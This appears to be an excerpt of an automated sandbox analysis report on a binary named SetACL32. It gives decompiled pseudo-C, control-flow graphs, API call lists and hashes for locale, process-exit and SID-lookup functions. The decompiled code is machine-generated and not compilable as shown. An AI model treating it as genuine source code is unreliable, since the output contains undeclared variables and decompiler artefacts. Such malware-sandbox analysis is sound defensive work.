              • Instruction Fuzzy Hash: A791B371A202169FDB14CF68DC84BAEBBF9EF49B10F14862DEB05E7244D7709944CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012D9760 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251COMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 649 12d9760-12d979d call 12d7220 652 12d979f-12d97b1 call 12d96f3 649->652 653 12d97b3-12d97b7 649->653 652->653 655 12d97b9-12d97be 653->655 656 12d9800 call 12d9064 653->656 658 12d97c7 call 12d9184 655->658 659 12d97c0-12d97c5 call 12d90eb 655->659 662 12d9805 656->662 664 12d97cc-12d97d2 658->664 659->664 666 12d9806-12d980b 662->666 664->666 667 12d97d4-12d97e6 call 12d96f3 664->667 668 12d9947 666->668 669 12d9811-12d981a 666->669 667->666 679 12d97e8-12d97f0 667->679 673 12d9949-12d994d 668->673 670 12d981c-12d981f 669->670 671 12d9829-12d9831 call 12d95b0 669->671 670->671 674 12d9821-12d9827 GetACP 670->674 677 12d9832-12d9836 671->677 674->677 677->668 682 12d983c-12d9842 677->682 680 12d97f9-12d97fe call 12d9184 679->680 681 12d97f2-12d97f7 call 12d90eb 679->681 680->662 681->662 682->668 684 12d9848-12d9854 IsValidCodePage 682->684 684->668 687 12d985a-12d985f 684->687 689 12d9861 687->689 690 12d9863-12d9868 687->690 689->690 691 12d986e-12d987c 690->691 692 12d9942-12d9945 690->692 693 12d987f-12d9889 691->693 692->673 693->693 694 12d988b-12d98a3 call 12d832d 693->694 697 12d994e-12d99b7 call 12cf37c call 12d7220 * 2 call 12d9e9b GetLocaleInfoW 694->697 698 12d98a9-12d98b9 call 12da806 694->698 715 12d99be-12d99d1 call 12df3fb 697->715 716 12d99b9-12d99bc 697->716 698->668 703 12d98bf-12d98db call 12da806 698->703 703->668 710 12d98dd-12d98e9 call 12e601c 703->710 717 12d98f9-12d990c call 12da806 710->717 718 12d98eb-12d98f7 call 12e601c 710->718 727 12d99e7-12d99ee 715->727 728 12d99d3-12d99dc call 12d9fcd 715->728 719 12d99f1-12d99ff call 12cae19 716->719 717->668 729 12d990e-12d991a 717->729 718->717 718->729 727->719 728->727 739 12d99de-12d99e4 728->739 731 12d991c-12d9930 call 12d832d 729->731 732 12d9934-12d993f call 12e0a80 729->732 731->697 740 12d9932 731->740 732->692 739->727 740->692
              C-Code - Quality: 70%
              			E012D9760(void* __ecx, void* __edx, void* __eflags, intOrPtr* _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				signed int _v12;
				intOrPtr _v40;
				signed int _v52;
				char _v252;
				short _v292;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t33;
				short* _t34;
				intOrPtr* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed short _t39;
				signed short* _t42;
				intOrPtr _t45;
				void* _t47;
				signed int _t50;
				void* _t52;
				signed int _t56;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t77;
				intOrPtr* _t84;
				short* _t86;
				void* _t88;
				intOrPtr* _t91;
				intOrPtr* _t95;
				signed int _t113;
				void* _t114;
				intOrPtr* _t116;
				intOrPtr _t119;
				signed int* _t120;
				void* _t121;
				intOrPtr* _t123;
				signed short _t125;
				int _t127;
				void* _t128;
				void* _t131;
				signed int _t132;

				_push(__ecx);
				_push(__ecx);
				_t84 = _a4;
				_t33 = E012D7220(__ecx, __edx);
				_t113 = 0;
				_v12 = 0;
				_t3 = _t33 + 0x50; // 0x50
				_t123 = _t3;
				_t4 = _t123 + 0x250; // 0x2a0
				_t34 = _t4;
				 *((intOrPtr*)(_t123 + 8)) = 0;
				 *_t34 = 0;
				_t6 = _t123 + 4; // 0x54
				_t116 = _t6;
				_v8 = _t34;
				_t91 = _t84;
				_t35 = _t84 + 0x80;
				 *_t123 = _t84;
				 *_t116 = _t35;
				if( *_t35 != 0) {
					E012D96F3(0x12f1f68, 0x16, _t116);
					_t91 =  *_t123;
					_t131 = _t131 + 0xc;
					_t113 = 0;
				}
				_push(_t123);
				if( *_t91 == _t113) {
					E012D9064(_t84, _t91); // executed
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t116)) == _t113) {
						E012D9184();
					} else {
						E012D90EB(_t91);
					}
					if( *((intOrPtr*)(_t123 + 8)) == 0) {
						_t77 = E012D96F3(0x12f1c58, 0x40, _t123);
						_t131 = _t131 + 0xc;
						if(_t77 != 0) {
							_push(_t123);
							if( *((intOrPtr*)( *_t116)) == 0) {
								E012D9184();
							} else {
								E012D90EB(0);
							}
							L12:
						}
					}
				}
				if( *((intOrPtr*)(_t123 + 8)) == 0) {
					L37:
					_t37 = 0;
					goto L38;
				} else {
					_t38 = _t84 + 0x100;
					if( *_t84 != 0 ||  *_t38 != 0) {
						_t39 = E012D95B0(_t38, _t123);
					} else {
						_t39 = GetACP();
					}
					_t125 = _t39;
					if(_t125 == 0 || _t125 == 0xfde8 || IsValidCodePage(_t125 & 0x0000ffff) == 0) {
						goto L37;
					} else {
						_t42 = _a8;
						if(_t42 != 0) {
							 *_t42 = _t125;
						}
						_t119 = _a12;
						if(_t119 == 0) {
							L36:
							_t37 = 1;
							L38:
							return _t37;
						} else {
							_t95 = _v8;
							_t15 = _t119 + 0x120; // 0xd0
							_t86 = _t15;
							 *_t86 = 0;
							_t16 = _t95 + 2; // 0x6
							_t114 = _t16;
							do {
								_t45 =  *_t95;
								_t95 = _t95 + 2;
							} while (_t45 != _v12);
							_t18 = (_t95 - _t114 >> 1) + 1; // 0x3
							_t47 = E012D832D(_t86, 0x55, _v8);
							_t132 = _t131 + 0x10;
							if(_t47 != 0) {
								L39:
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E012CF37C();
								asm("int3");
								_t130 = _t132;
								_t50 =  *0x1309018; // 0xedd8d3b4
								_v52 = _t50 ^ _t132;
								_push(_t86);
								_push(_t125);
								_push(_t119);
								_t52 = E012D7220(_t97, _t114);
								_t87 = _t52;
								_t120 =  *(E012D7220(_t97, _t114) + 0x34c);
								_t127 = E012D9E9B(_v40);
								asm("sbb ecx, ecx");
								_t56 = GetLocaleInfoW(_t127, ( ~( *(_t52 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								if(_t56 != 0) {
									if(E012DF3FB(_t120, _t127,  *((intOrPtr*)(_t87 + 0x54)),  &_v252) == 0 && E012D9FCD(_t127) != 0) {
										 *_t120 =  *_t120 | 0x00000004;
										_t120[2] = _t127;
										_t120[1] = _t127;
									}
									_t62 =  !( *_t120 >> 2) & 0x00000001;
								} else {
									 *_t120 =  *_t120 & _t56;
									_t62 = _t56 + 1;
								}
								_pop(_t121);
								_pop(_t128);
								_pop(_t88);
								return E012CAE19(_t62, _t88, _v12 ^ _t130, _t114, _t121, _t128);
							} else {
								if(E012DA806(_t86, 0x1001, _t119, 0x40) == 0) {
									goto L37;
								} else {
									_t20 = _t119 + 0x80; // 0x30
									_t86 = _t20;
									_t21 = _t119 + 0x120; // 0xd0
									if(E012DA806(_t21, 0x1002, _t86, 0x40) == 0) {
										goto L37;
									} else {
										_push(0x5f);
										_t68 = E012E601C(_t97);
										_t97 = _t86;
										if(_t68 != 0) {
											L31:
											_t22 = _t119 + 0x120; // 0xd0
											if(E012DA806(_t22, 7, _t86, 0x40) == 0) {
												goto L37;
											} else {
												goto L32;
											}
										} else {
											_push(0x2e);
											_t73 = E012E601C(_t97);
											_t97 = _t86;
											if(_t73 == 0) {
												L32:
												_t119 = _t119 + 0x100;
												if(_t125 != 0xfde9) {
													E012E0A80(_t97, _t125, _t119, 0x10, 0xa);
													goto L36;
												} else {
													_push(5);
													_t72 = E012D832D(_t119, 0x10, L"utf8");
													_t132 = _t132 + 0x10;
													if(_t72 != 0) {
														goto L39;
													} else {
														goto L36;
													}
												}
											} else {
												goto L31;
											}
										}
									}
								}
							}
						}
					}
				}
			}














































              0x012d9765
              0x012d9766
              0x012d9768
              0x012d976d
              0x012d9774
              0x012d9776
              0x012d9779
              0x012d9779
              0x012d977c
              0x012d977c
              0x012d9782
              0x012d9785
              0x012d9788
              0x012d9788
              0x012d978b
              0x012d978e
              0x012d9790
              0x012d9796
              0x012d9798
              0x012d979d
              0x012d97a7
              0x012d97ac
              0x012d97ae
              0x012d97b1
              0x012d97b1
              0x012d97b3
              0x012d97b7
              0x012d9800
              0x00000000
              0x012d97b9
              0x012d97be
              0x012d97c7
              0x012d97c0
              0x012d97c0
              0x012d97c0
              0x012d97d2
              0x012d97dc
              0x012d97e1
              0x012d97e6
              0x012d97ec
              0x012d97f0
              0x012d97f9
              0x012d97f2
              0x012d97f2
              0x012d97f2
              0x012d9805
              0x012d9805
              0x012d97e6
              0x012d97d2
              0x012d980b
              0x012d9947
              0x012d9947
              0x00000000
              0x012d9811
              0x012d9811
              0x012d981a
              0x012d982b
              0x012d9821
              0x012d9821
              0x012d9821
              0x012d9832
              0x012d9836
              0x00000000
              0x012d985a
              0x012d985a
              0x012d985f
              0x012d9861
              0x012d9861
              0x012d9863
              0x012d9868
              0x012d9942
              0x012d9944
              0x012d9949
              0x012d994d
              0x012d986e
              0x012d986e
              0x012d9871
              0x012d9871
              0x012d9879
              0x012d987c
              0x012d987c
              0x012d987f
              0x012d987f
              0x012d9882
              0x012d9885
              0x012d988f
              0x012d9899
              0x012d989e
              0x012d98a3
              0x012d994e
              0x012d9950
              0x012d9951
              0x012d9952
              0x012d9953
              0x012d9954
              0x012d9955
              0x012d995a
              0x012d995e
              0x012d9966
              0x012d996d
              0x012d9970
              0x012d9971
              0x012d9975
              0x012d9976
              0x012d997b
              0x012d9983
              0x012d9992
              0x012d999e
              0x012d99af
              0x012d99b7
              0x012d99d1
              0x012d99de
              0x012d99e1
              0x012d99e4
              0x012d99e4
              0x012d99ee
              0x012d99b9
              0x012d99b9
              0x012d99bb
              0x012d99bb
              0x012d99f4
              0x012d99f5
              0x012d99f8
              0x012d99ff
              0x012d98a9
              0x012d98b9
              0x00000000
              0x012d98bf
              0x012d98c1
              0x012d98c1
              0x012d98cd
              0x012d98db
              0x00000000
              0x012d98dd
              0x012d98dd
              0x012d98e0
              0x012d98e6
              0x012d98e9
              0x012d98f9
              0x012d98fe
              0x012d990c
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012d98eb
              0x012d98eb
              0x012d98ee
              0x012d98f4
              0x012d98f7
              0x012d990e
              0x012d990e
              0x012d991a
              0x012d993a
              0x00000000
              0x012d991c
              0x012d991c
              0x012d9926
              0x012d992b
              0x012d9930
              0x00000000
              0x012d9932
              0x00000000
              0x012d9932
              0x012d9930
              0x00000000
              0x00000000
              0x00000000
              0x012d98f7
              0x012d98e9
              0x012d98db
              0x012d98b9
              0x012d98a3
              0x012d9868
              0x012d9836

              APIs
                • Part of subcall function 012D7220: GetLastError.KERNEL32(?,?,?,012D4163,01307070,0000000C), ref: 012D7225
                • Part of subcall function 012D7220: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,012D4163,01307070,0000000C), ref: 012D72C3
              • GetACP.KERNEL32(?,?,?,?,?,?,012CFBD2,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 012D9821
              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,012CFBD2,?,?,?,00000055,?,-00000050,?,?), ref: 012D984C
              • _wcschr.LIBVCRUNTIME ref: 012D98E0
              • _wcschr.LIBVCRUNTIME ref: 012D98EE
              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 012D99AF
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
              • String ID: utf8
              • API String ID: 4147378913-905460609
              • Opcode ID: 75c2fdf527507df4460c4a14c53e116f3644a7bd4ac5aaa9e16810ec7fd5687e
              • Instruction ID: 06cf2f8ba7a60d1958c106c0981e852a759954e9f6cce35e677fe8096140a97b
              • Opcode Fuzzy Hash: 75c2fdf527507df4460c4a14c53e116f3644a7bd4ac5aaa9e16810ec7fd5687e
              • Instruction Fuzzy Hash: B671F671A20307AAEF25AB79CC46BB777A8EF55718F144029FB05DB180EA70D980C7A5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012D6588 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 998 12d6588-12d6595 call 12dcb92 1001 12d65b7-12d65c3 call 12d65ca ExitProcess 998->1001 1002 12d6597-12d65a5 GetPEB 998->1002 1002->1001 1003 12d65a7-12d65b1 GetCurrentProcess TerminateProcess 1002->1003 1003->1001
              C-Code - Quality: 100%
              			E012D6588(int _a4) {
				void* _t14;

				if(E012DCB92(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E012D65CA(_t14, _a4);
				ExitProcess(_a4);
			}




              0x012d6595
              0x012d65b1
              0x012d65b1
              0x012d65ba
              0x012d65c3

              APIs
              • GetCurrentProcess.KERNEL32(?,?,012D6587,?,?,?,?), ref: 012D65AA
              • TerminateProcess.KERNEL32(00000000,?,012D6587,?,?,?,?), ref: 012D65B1
              • ExitProcess.KERNEL32 ref: 012D65C3
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: Process$CurrentExitTerminate
              • String ID:
              • API String ID: 1703294689-0
              • Opcode ID: b96d422289991866d4181c374e8b24ffcc74401f1f8fd664957c101f2802dc24
              • Instruction ID: a91a805f38f5fd5dae38bc2a164924161ed955997a11af18a3ad2a524ef7cb9b
              • Opcode Fuzzy Hash: b96d422289991866d4181c374e8b24ffcc74401f1f8fd664957c101f2802dc24
              • Instruction Fuzzy Hash: 70E0EC7101014AAFDF266F58E90CAAD3FA9FF50241F414414F9098E129CB35DDD1DB91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012DCB4E Relevance: .0, Instructions: 29COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4b6fb5a062d0945fd44655e75a84e7ea221f0421d7a3d0e1812882e685ba9e42
              • Instruction ID: 582543d600f431a7de4cf8f5ebb9fae4eed3d204456c6ca1c8070d3ba1e85f7e
              • Opcode Fuzzy Hash: 4b6fb5a062d0945fd44655e75a84e7ea221f0421d7a3d0e1812882e685ba9e42
              • Instruction Fuzzy Hash: 66F06D36A24224EFCB27CB5CC415EA9B3ECEB49B65F11409AE601EB241D2B0DE40DBD0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012C7950 Relevance: 19.9, APIs: 10, Strings: 1, Instructions: 642COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 281 12c7950-12c799b 282 12c79ac-12c79b2 281->282 283 12c799d-12c79a6 call 12d3434 281->283 285 12c79b4 282->285 286 12c79b6-12c79c6 ConvertStringSidToSidW 282->286 283->282 285->286 288 12c79c8-12c79d0 286->288 289 12c7a2a-12c7a69 286->289 292 12c7a0d 288->292 293 12c79d2-12c79db IsValidSid 288->293 290 12c7a6b-12c7a6d 289->290 291 12c7a73-12c7a75 289->291 290->291 296 12c7a7b-12c7a89 291->296 297 12c7bd4 291->297 295 12c7a0f-12c7a25 LocalFree 292->295 293->292 294 12c79dd-12c79f5 GetLengthSid call 12d4006 293->294 294->292 310 12c79f7-12c7a02 CopySid 294->310 299 12c8086-12c80a1 call 12cae19 295->299 300 12c7a9f 296->300 301 12c7a8b 296->301 302 12c7bda-12c7be4 call 12c9350 297->302 304 12c7aa1-12c7aa3 300->304 307 12c7a90-12c7a93 301->307 313 12c7bfd-12c7c47 call 12a1ee0 call 12a2640 302->313 314 12c7be6-12c7bfa 302->314 304->297 309 12c7aa9-12c7ab4 304->309 307->304 312 12c7a95-12c7a9d 307->312 309->297 315 12c7aba-12c7ac2 309->315 310->295 316 12c7a04-12c7a0a call 12d3434 310->316 312->300 312->307 336 12c7c49-12c7c5b 313->336 337 12c7c7b-12c7c92 313->337 314->313 318 12c7ace-12c7af0 315->318 319 12c7ac4-12c7ac9 315->319 316->292 323 12c7af4-12c7b10 call 12a1ee0 call 12982b0 318->323 324 12c7af2 318->324 322 12c803d-12c8054 319->322 326 12c8084 322->326 327 12c8056-12c8068 322->327 350 12c7b44-12c7b5f 323->350 351 12c7b12-12c7b24 323->351 324->323 326->299 330 12c807a-12c8081 call 12cae27 327->330 331 12c806a-12c8078 327->331 330->326 331->330 334 12c80b8-12c8133 call 12cf35f ConvertSidToStringSidW 331->334 356 12c8135-12c813a 334->356 357 12c8163-12c81a7 call 12cae19 334->357 341 12c7c5d-12c7c6b 336->341 342 12c7c71-12c7c78 call 12cae27 336->342 344 12c7cdc 337->344 345 12c7c94-12c7cd1 call 12c9dcb call 12a3780 337->345 341->342 348 12c80a9 call 12cf35f 341->348 342->337 347 12c7ce2 344->347 345->347 383 12c7cd3-12c7cda 345->383 358 12c7ce9-12c7cf3 347->358 372 12c80ae call 12cf35f 348->372 354 12c80a4 call 12986e0 350->354 355 12c7b65-12c7b76 350->355 360 12c7b3a-12c7b41 call 12cae27 351->360 361 12c7b26-12c7b34 351->361 354->348 364 12c7b78 355->364 365 12c7b7a-12c7b9e call 12a1ee0 call 12982b0 355->365 356->357 366 12c813c-12c813e 356->366 367 12c7d0e-12c7d15 358->367 368 12c7cf5-12c7cf7 358->368 360->350 361->334 361->360 364->365 365->302 403 12c7ba0-12c7bb2 365->403 377 12c8141-12c814a 366->377 379 12c7d1b-12c7d7d call 12983b0 * 2 DsGetDcNameW 367->379 380 12c7e87-12c7eb7 call 12c8d30 367->380 368->367 378 12c7cf9-12c7d02 368->378 382 12c80b3 call 12cf35f 372->382 377->377 385 12c814c-12c815d call 12a1ee0 LocalFree 377->385 378->367 397 12c7d04-12c7d0a 378->397 409 12c7d7f-12c7d8c 379->409 410 12c7df0-12c7dfa 379->410 393 12c7ebc-12c7ec5 380->393 382->334 383->358 385->357 398 12c7ecb-12c7ed1 393->398 399 12c7f72-12c7f78 393->399 397->367 400 12c7eee-12c7ef4 398->400 401 12c7ed3-12c7ee9 call 12c8d30 398->401 404 12c7fac-12c7fb2 399->404 405 12c7f7a-12c7f8c 399->405 400->399 411 12c7ef6-12c7f3e call 12a1ee0 call 12c8d30 400->411 401->399 414 12c7bc8-12c7bd2 call 12cae27 403->414 415 12c7bb4-12c7bc2 403->415 412 12c7fe9-12c8006 404->412 413 12c7fb4-12c7fc9 404->413 406 12c7f8e-12c7f9c 405->406 407 12c7fa2-12c7fa9 call 12cae27 405->407 406->334 406->407 407->404 418 12c7d90-12c7d99 409->418 425 12c7dfc-12c7e0e 410->425 426 12c7e2e-12c7e30 410->426 411->399 452 12c7f40-12c7f52 411->452 422 12c8008-12c801a 412->422 423 12c803a 412->423 420 12c7fdf-12c7fe6 call 12cae27 413->420 421 12c7fcb-12c7fd9 413->421 414->302 415->334 415->414 418->418 430 12c7d9b-12c7de7 call 12a1ee0 call 129a2d0 call 12aabf0 418->430 420->412 421->334 421->420 433 12c801c-12c802a 422->433 434 12c8030-12c8037 call 12cae27 422->434 423->322 436 12c7e24-12c7e2b call 12cae27 425->436 437 12c7e10-12c7e1e 425->437 428 12c7e49-12c7e53 426->428 429 12c7e32-12c7e44 call 12a1ee0 426->429 428->380 441 12c7e55-12c7e67 428->441 429->428 430->410 462 12c7de9-12c7dea NetApiBufferFree 430->462 433->334 433->434 434->423 436->426 437->372 437->436 447 12c7e7d-12c7e84 call 12cae27 441->447 448 12c7e69-12c7e77 441->448 447->380 448->334 448->447 455 12c7f68-12c7f6f call 12cae27 452->455 456 12c7f54-12c7f62 452->456 455->399 456->382 456->455 462->410
              C-Code - Quality: 75%
              			E012C7950(signed int* __ecx, signed int __edx, signed int _a4, intOrPtr _a8) {
				char _v8;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v36;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				char _v60;
				void* _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				short _v116;
				signed int _v120;
				signed int _v124;
				short _v140;
				char _v141;
				signed char _v148;
				char* _v152;
				void* _v156;
				char _v160;
				void* _v164;
				signed int _v168;
				intOrPtr _v204;
				intOrPtr _v212;
				char _v220;
				signed int _v228;
				signed char _v232;
				signed int _v236;
				signed int _v252;
				signed int* _v256;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t212;
				signed int _t213;
				signed int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t227;
				signed int _t230;
				signed int _t232;
				signed int _t238;
				signed int _t239;
				signed int _t242;
				signed int _t245;
				intOrPtr _t248;
				intOrPtr _t252;
				signed int _t256;
				signed int _t263;
				signed int _t264;
				signed int _t270;
				signed int _t278;
				signed int _t279;
				signed int _t286;
				signed int _t291;
				void* _t296;
				signed int _t299;
				signed int _t303;
				signed int _t304;
				void* _t314;
				intOrPtr _t318;
				void* _t320;
				signed int _t321;
				signed int _t326;
				signed int _t330;
				signed char _t342;
				signed int _t343;
				void* _t344;
				void* _t345;
				long _t348;
				signed int _t351;
				signed int* _t353;
				signed int _t354;
				signed int* _t355;
				signed int _t360;
				signed int _t365;
				short _t369;
				intOrPtr _t370;
				signed int _t371;
				signed int* _t372;
				signed int _t374;
				void _t380;
				intOrPtr _t387;
				signed int _t388;
				void* _t391;
				signed int _t394;
				signed int _t395;
				signed int _t397;
				signed int _t399;
				signed int _t400;
				void* _t401;
				void* _t402;
				signed int _t404;
				void* _t405;
				signed int _t407;
				signed int _t408;
				void* _t409;
				void* _t413;
				signed int _t415;
				signed int _t416;
				void* _t417;
				void* _t418;
				void* _t419;
				void* _t422;
				signed int _t424;
				void* _t425;
				signed int* _t426;
				void* _t427;
				void* _t428;
				signed int _t430;
				signed int _t433;
				signed int _t435;
				void* _t436;
				void* _t437;
				signed char _t446;

				_t395 = __edx;
				_t430 = _t435;
				_push(0xffffffff);
				_push(0x12ecbba);
				_push( *[fs:0x0]);
				_t436 = _t435 - 0x9c;
				_t212 =  *0x1309018; // 0xedd8d3b4
				_t213 = _t212 ^ _t430;
				_v20 = _t213;
				_push(_t213);
				 *[fs:0x0] =  &_v16;
				_t415 = __ecx;
				_v168 = __ecx;
				_t424 = _a4;
				_v156 = 0;
				_v148 = 0;
				_t216 =  *__ecx;
				if( *__ecx != 0) {
					E012D3434(_t216);
					_t436 = _t436 + 4;
					 *__ecx = 0;
				}
				_t217 = _t424;
				if( *((intOrPtr*)(_t424 + 0x14)) >= 8) {
					_t217 =  *_t424;
				}
				__imp__ConvertStringSidToSidW(_t217,  &_v164);
				if(_t217 == 0) {
					_t342 = 7;
					_v92 = 0;
					_v76 = 0;
					_v72 = 7;
					_v92 = 0;
					_v8 = 0;
					_v116 = 0;
					_v100 = 0;
					_v96 = 7;
					_v116 = 0;
					_v8 = 1;
					_t351 = _t424;
					__eflags =  *((intOrPtr*)(_t424 + 0x14)) - 8;
					_t23 = _t424 + 0x10; // 0x2b
					_t219 =  *_t23;
					_v148 = _t424;
					if( *((intOrPtr*)(_t424 + 0x14)) >= 8) {
						_t351 =  *_t424;
						_v148 = _t351;
					}
					__eflags = _t219;
					if(__eflags == 0) {
						L37:
						_t342 = _v156;
						goto L38;
					} else {
						_t395 = _t219;
						__eflags =  *_v148 - 0x5c;
						if( *_v148 == 0x5c) {
							L19:
							_t415 = _t351;
						} else {
							while(1) {
								__eflags = _t395 - 1;
								if(_t395 == 1) {
									goto L20;
								}
								_t351 = _t351 + 2;
								_t395 = _t395 - 1;
								__eflags =  *_t351 - 0x5c;
								if( *_t351 != 0x5c) {
									continue;
								} else {
									goto L19;
								}
								goto L20;
							}
						}
						L20:
						__eflags = _t415;
						if(__eflags == 0) {
							goto L37;
						} else {
							_t415 = _t415 - _v148 >> 1;
							__eflags = _t415 - 0xffffffff;
							if(__eflags == 0) {
								goto L37;
							} else {
								_t28 = _t424 + 0x10; // 0x2b
								_t387 =  *_t28;
								_t29 = _t387 - 2; // 0x29
								__eflags = _t415 - _t29;
								if(_t415 <= _t29) {
									__eflags = _t387 - _t415;
									_v44 = 0;
									_v28 = 0;
									_t314 =  <  ? _t387 : _t415;
									_v24 = 7;
									__eflags =  *((intOrPtr*)(_t424 + 0x14)) - 8;
									_t388 = _t424;
									if( *((intOrPtr*)(_t424 + 0x14)) >= 8) {
										_t388 =  *_t424;
									}
									E012A1EE0(_t342,  &_v44, _t395, _t415, _t424, _t388, _t314);
									_t360 =  &_v92;
									E012982B0(_t342, _t360,  &_v44);
									_t395 = _v24;
									__eflags = _t395 - 8;
									if(_t395 < 8) {
										L30:
										_t42 = _t424 + 0x10; // 0x2b
										_t318 =  *_t42;
										_t416 = _t415 + 1;
										_v44 = 0;
										_v28 = 0;
										_v24 = 7;
										__eflags = _t318 - _t416;
										if(__eflags < 0) {
											E012986E0(_t360, __eflags);
											goto L97;
										} else {
											_t320 = _t318 - _t416;
											__eflags = _t320 - 0xffffffff;
											_t391 =  <  ? _t320 : _t360 | 0xffffffff;
											__eflags =  *((intOrPtr*)(_t424 + 0x14)) - 8;
											_t321 = _t424;
											if( *((intOrPtr*)(_t424 + 0x14)) >= 8) {
												_t321 =  *_t424;
											}
											E012A1EE0(_t342,  &_v44, _t395, _t416, _t424, _t321 + _t416 * 2, _t391);
											_t342 = 6;
											E012982B0(6,  &_v116,  &_v44);
											_t395 = _v24;
											__eflags = _t395 - 8;
											if(__eflags < 0) {
												L38:
												_t220 = E012C9350( &_v92, __eflags);
												__eflags = _t220;
												if(_t220 != 0) {
													__eflags = _v72 - 8;
													_v76 = 0;
													_t310 =  >=  ? _v92 :  &_v92;
													__eflags = 0;
													 *((short*)( >=  ? _v92 :  &_v92)) = 0;
												}
												_v68 = 0;
												_t353 =  &_v68;
												_v52 = 0;
												_v48 = 7;
												_v68 = 0;
												E012A1EE0(_t342, _t353, _t395, _t415, _t424, L"computername", 0xc);
												_push(_t353);
												_v8 = 2;
												_t354 =  &_v140;
												E012A2640(_t342, _t354,  &_v68, __eflags); // executed
												_t437 = _t436 + 4;
												_v8 = 4;
												_t397 = _v48;
												__eflags = _t397 - 8;
												if(_t397 < 8) {
													L44:
													_v52 = 0;
													_v48 = 7;
													_v68 = 0;
													__eflags = _v76;
													if(__eflags == 0) {
														_t416 = _v156;
														goto L48;
													} else {
														_push(1);
														_v8 = 5;
														_t416 = E012C9DCB(_t342, _t415, _t424, __eflags);
														_v156 = _t416;
														_v8 = 6;
														_t342 = _t342 | 0x00000001;
														_push( &_v160);
														_t354 =  &_v140;
														_v148 = _t342;
														_t303 = E012A3780(_t354,  &_v92);
														_t437 = _t437 + 8;
														__eflags = _t303;
														if(_t303 != 0) {
															L48:
															_v141 = 0;
														} else {
															_v141 = 1;
														}
													}
													_v8 = 4;
													__eflags = _t342 & 0x00000001;
													if((_t342 & 0x00000001) != 0) {
														__eflags = _t416;
														if(_t416 != 0) {
															_t354 = _t416;
															_t299 =  *((intOrPtr*)( *_t416 + 8))();
															__eflags = _t299;
															if(_t299 != 0) {
																_t354 = _t299;
																 *((intOrPtr*)( *((intOrPtr*)( *_t299))))(1);
															}
														}
													}
													__eflags = _v141;
													if(_v141 == 0) {
														L69:
														_v68 = 0;
														_v52 = 0;
														_v48 = 7;
														_v68 = 0;
														_t343 = _v168;
														_push(_t354);
														_t398 = _t424;
														_v8 = 9;
														_t355 =  &_v92;
														_t227 = E012C8D30(_t355, _t424,  &_v68, _t343); // executed
														_t437 = _t437 + 0xc;
														_t416 = _t227;
														__eflags = _a8 - 1;
														if(_a8 != 1) {
															L77:
															_t399 = _v48;
															__eflags = _t399 - 8;
															if(_t399 < 8) {
																L81:
																_t400 = _v120;
																__eflags = _t400 - 8;
